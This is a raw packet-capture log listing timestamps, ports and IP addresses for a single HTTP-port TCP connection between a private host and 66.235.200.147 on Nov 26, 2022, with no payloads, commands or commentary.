Nov 26, 2022 11:17:42.522439003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522445917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522459030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522459984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522480011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522480965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522502899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522504091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522526026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522547007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522558928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522567987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522589922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522587061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522609949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522612095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522630930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522640944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522651911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522661924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522674084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522675991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522695065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522710085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522710085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522716045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522737026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522738934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522773981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522800922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.522948027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522970915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.522994041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523015022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523021936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523036003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523047924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523057938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523072004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523078918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523083925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523096085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523113012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523128033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523153067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523168087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523184061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523224115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523248911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523252010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523273945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523296118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523317099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523334026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523338079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523348093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523360014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523360968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523375034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523380041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523400068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523401976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523420095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523422956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523443937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523448944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523464918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523475885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523487091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523487091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523508072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523509979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523521900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523530960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523550034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523550987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523574114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523576975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523588896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523596048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523618937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523621082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523633957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523638964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523659945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523662090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523680925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523690939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523700953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523706913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523721933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523721933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523744106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523756027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523756027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523763895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523786068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523792028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523803949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523808002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523828030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523829937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523845911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523852110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.523874998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.523897886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.527967930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.528059959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.532949924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.532980919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.533000946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.533019066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.533035040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.533072948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.535824060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536005974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536086082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.536745071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536763906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536813021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.536873102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536891937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536911964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536931992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536951065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.536998034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537067890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537103891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537153959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537378073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537420988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537456036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537565947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537748098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537767887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537796021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537798882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537807941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537818909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.537842035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.537854910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538192034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538211107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538235903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538252115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538264990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538285017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538305044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538322926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538327932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538341999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538357973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538377047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538386106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538424969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538444042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538461924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538466930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538479090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538491964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538511992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538525105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538573980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538592100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538610935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538634062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538656950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538657904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538676023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538695097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538696051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538712978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538716078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538731098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.538733959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538746119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538783073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.538959980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539005041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539021015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539043903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539060116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539067984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539081097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539091110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539108992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539113998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539124966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539136887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539160967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539199114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539199114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539203882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539216042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539247036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539263010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539320946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539450884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539475918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539499998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539500952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539514065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539524078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539541960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539546967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539571047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539594889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539618015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539640903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539648056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539648056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539648056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539648056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539664030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539671898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539684057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539689064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539711952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539716005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539736986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539736986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539755106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539760113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539783001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539783001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539808989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539812088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539825916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539832115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539855957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539855957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539880037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539880991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539904118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539906979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539927959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539932013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539951086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539961100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.539974928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.539999008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540023088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540046930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540071011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540081024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540081024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540081024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540095091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540103912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540103912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540128946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540142059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540153027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540175915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540177107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540199041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540204048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540216923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540222883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540237904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540246010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540266037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540268898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540282965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540292978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540311098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540317059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540330887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540338993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540354013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540361881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540381908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540385008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540399075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540410042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540435076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540436983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540447950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540457010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540476084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540481091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540493011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540504932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540527105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540528059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540544033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540550947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540565968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540574074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540590048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540597916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540615082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540621996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540644884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540647984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540662050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540668011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540684938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540692091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540713072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540714979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540730953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540740013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540764093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540823936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540823936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540858030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540899992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540924072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540949106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540951014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540966034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.540971994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540996075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.540997028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541018009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541021109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541042089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541043043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541055918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541064978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541084051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541088104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541111946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541125059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541135073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541140079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541158915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541181087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541193962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541217089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541239023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541263103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541280031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541289091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541302919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541327000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541327000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.541349888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.541357994 CET	49707	80	192.168.2.5	66.235.200.147
